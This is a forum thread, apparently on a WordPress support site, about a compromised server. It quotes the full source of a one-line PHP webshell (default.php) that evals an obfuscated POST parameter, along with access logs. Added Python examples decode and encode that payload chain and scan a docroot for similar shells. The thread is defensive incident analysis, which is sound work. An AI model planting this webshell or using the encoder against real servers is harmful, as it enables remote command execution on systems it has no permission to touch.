Compromised - Unknown Files

In my root web directory a new file popped up recently called default.php:

<?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>

Appears to be a compromise. Does anyone have a similar file in their root directory?

I have a few access attempts to that file:
http://www.tensosys.biz - - [03/Jan/2012:11:34:08 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
http://www.tensosys.biz - - [03/Jan/2012:11:36:26 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
kwan.lunarpages.com - - [03/Jan/2012:12:07:56 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"
kwan.lunarpages.com - - [03/Jan/2012:12:12:27 -0500] "POST /default.php HTTP/1.0" 200 0 "" "-"

Any ideas what the file is attempting to accomplish?
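For anyone wanting to see what such a POST actually carries, here is an added Python example (not code from the thread or from the shell's author) that reverses the decode chain in the posted one-liner, eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"])))))), so a captured "e" value from an access log or a logging wrapper can be turned back into the PHP the attacker ran. The encode_payload() function and the SAMPLE_E value are my own constructions for producing test input; the lenient base64 handling is an assumption that mirrors PHP's non-strict base64_decode():

```python
import base64
import codecs
import re

# Added example, not part of the original post. Undoes the chain
#   eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))))
# so a logged "e" parameter can be read as the PHP source it would execute.


def _b64decode_lenient(s: str) -> bytes:
    """PHP's base64_decode() drops non-alphabet bytes and tolerates missing
    padding (assumption mirrored here); normalise before decoding."""
    s = re.sub(r"[^A-Za-z0-9+/=]", "", s).rstrip("=")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_stages(e: str) -> list:
    """Return every intermediate value the shell computes; the last element
    is the PHP source that reaches eval()."""
    s1 = codecs.encode(e, "rot13")                           # str_rot13
    s2 = _b64decode_lenient(s1).decode("latin-1")            # base64_decode
    s3 = s2[::-1]                                            # strrev
    s4 = codecs.encode(s3, "rot13")                          # str_rot13
    s5 = _b64decode_lenient(s4).decode("utf-8", "replace")   # base64_decode
    return [s1, s2, s3, s4, s5]


def decode_payload(e: str) -> str:
    """The PHP code the shell would eval() for a given POST value of e."""
    return decode_stages(e)[-1]


def encode_payload(php_code: str) -> str:
    """Build the value an operator would POST as "e": the chain above applied
    in reverse. Used here only to construct sample input."""
    a = base64.b64encode(php_code.encode("utf-8")).decode("ascii")
    b = codecs.encode(a, "rot13")
    c = b[::-1]
    d = base64.b64encode(c.encode("ascii")).decode("ascii")
    return codecs.encode(d, "rot13")


# Constructed sample: what a logged POST body would carry for this command.
SAMPLE_E = encode_payload("system('id');")

if __name__ == "__main__":
    for i, stage in enumerate(decode_stages(SAMPLE_E), 1):
        print(f"stage {i}: {stage}")
```

Feed decode_payload() the raw value of the "e" form field (URL-decoded first if it came from a query string or a log that stores it encoded). Each layer is reversible with no key, so the obfuscation only defeats naive grep-style signature matching, not analysis.
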

  • DavidM
    • DEV MAN’s Mascot

    Hi targetdir,

    That definitely doesn't seem good, though I imagine there's more to the default.php than that single line, correct?

    I've not heard of anything regarding a default.php file, I'll tag a few of the other guys over here to see if they're aware of anything surrounding this.

    -David

  • targetdir
    • Site Builder, Child of Zeus

    Hi,

    > I imagine there's more to the default.php than that single line, correct?

    That is the entire file.

    > A really common exploit being used right now is older versions of timthumb in your themes.

    I did a complete timthumb clean-up when the issue was announced.

    I modified default.php to save all variables to a log file whenever it is accessed. Hopefully it will give us some insight as to how it is being used. I'll keep this ticket open for now and post an update.

  • DavidM
    • DEV MAN’s Mascot

    Hiya targetdir,

    Aaron's clarified that one and I really should have caught onto that. I was thinking there'd need to be html form code to accompany it but I see what's in view now, definitely some bad stuff.

    The "open" status is more for our purposes than anything and as this thread isn't related to the plugins here it'd cause some confusion to keep it "open" as such. I'll mark this resolved for support purposes but the threads here are always open to further discussion and feedback.

    We'd also love to know how that resolution goes with this one. Definitely helps other members too, as it's always great to know how recovery from these occurrences go.

    Thanks,
    David

  • Barry
    • DEV MAN’s Mascot

@targetdir - but whilst you are at things - I suggest replacing all your WP core files, and those of your themes, as they seem to be the most targeted files for this type of attack. Then check the directories you allow uploads into, so uploads, updates and blogs.dir if you have it, and any cache directories in your themes directories.

  • targetdir
    • Site Builder, Child of Zeus

    > @targetdir - but whilst you are at things - I suggest replacing all your WP core files..

Hi Barry, thanks for the suggestion. I use SVN to install/manage WordPress so I was able to see which files were added or modified.

    Just to update this ticket:
    Default.php is designed to allow someone to run any server command - only limited to the rights of the user which Apache runs as. My log file captured a number of attempts to use default.php to further exploit the server, add additional files, etc.

    I guess the lesson here is to keep a close eye on your file system. SVN helps a lot in situations like this.
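As an added example (not code from anyone in this thread), the following Python sweep does the two checks Barry suggests and targetdir's log confirms are worthwhile: it flags PHP files sitting in web-writable WordPress directories (uploads, blogs.dir, theme cache directories) and files that feed decoded data or request input into eval(), the pattern of the posted default.php. The directory list, file extensions and regular expressions are my own assumptions about what is worth flagging, and SAMPLE_DOCROOT is a constructed in-memory docroot for demonstration:

```python
import os
import re

# Added example, not from the thread. Triage sweep for a WordPress docroot:
# PHP where only uploads belong, and eval() of decoded or user-supplied data.

# Directories the web server is normally allowed to write into (assumed list;
# "upgrade" is WordPress's update staging directory, "cache" catches theme caches).
WRITABLE_DIRS = ("wp-content/uploads", "wp-content/blogs.dir",
                 "wp-content/upgrade", "cache")
PHP_EXT = (".php", ".php5", ".phtml", ".phar")

# eval() whose argument is a decoding call: base64_decode, str_rot13, strrev, ...
EVAL_CHAIN = re.compile(
    r"eval\s*\(\s*(?:base64_decode|str_rot13|strrev|gzinflate|gzuncompress)\s*\(",
    re.IGNORECASE)
# eval() anywhere plus raw request input anywhere in the same file
EVAL_CALL = re.compile(r"\beval\s*\(", re.IGNORECASE)
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")


def classify(relpath, content):
    """Return the reasons a file is suspect; an empty list means nothing flagged."""
    reasons = []
    p = relpath.replace("\\", "/").lower()
    in_writable = any(p.startswith(d + "/") or ("/" + d + "/") in p
                      for d in WRITABLE_DIRS)
    if in_writable and p.endswith(PHP_EXT):
        reasons.append("php in web-writable directory")
    if EVAL_CHAIN.search(content):
        reasons.append("eval of decoded data")
    if EVAL_CALL.search(content) and REQUEST_INPUT.search(content):
        reasons.append("eval plus request input")
    return reasons


def scan_files(files):
    """files: {relative path: file text}. Returns only the suspect entries."""
    findings = {}
    for path, text in files.items():
        reasons = classify(path, text)
        if reasons:
            findings[path] = reasons
    return findings


def scan_tree(root):
    """Walk a real docroot on disk and run scan_files() over its contents."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
            except OSError:
                continue  # unreadable file; report separately if this matters
    return scan_files(files)


# Constructed sample docroot; default.php is the shell quoted in the thread.
SAMPLE_DOCROOT = {
    "default.php": '<?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"])'
                   '{eval(base64_decode(str_rot13(strrev(base64_decode('
                   'str_rot13($_POST["e"]))))));exit;} ?>',
    "wp-content/uploads/2012/01/photo.jpg": "\xff\xd8\xff",
    "wp-content/uploads/2012/01/photo.php": "<?php echo 'hi'; ?>",
    "wp-includes/functions.php": "<?php function wp_example() { return 1; } ?>",
}

if __name__ == "__main__":
    for path, reasons in sorted(scan_files(SAMPLE_DOCROOT).items()):
        print(path, "->", ", ".join(reasons))
```

Run scan_tree("/var/www/html") (or whatever the docroot is) for a real sweep. It is a first pass only: a webshell that avoids eval() or is stored outside these directories will not be flagged, so the check complements, rather than replaces, comparing the tree against a known-good copy the way targetdir did with SVN.
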
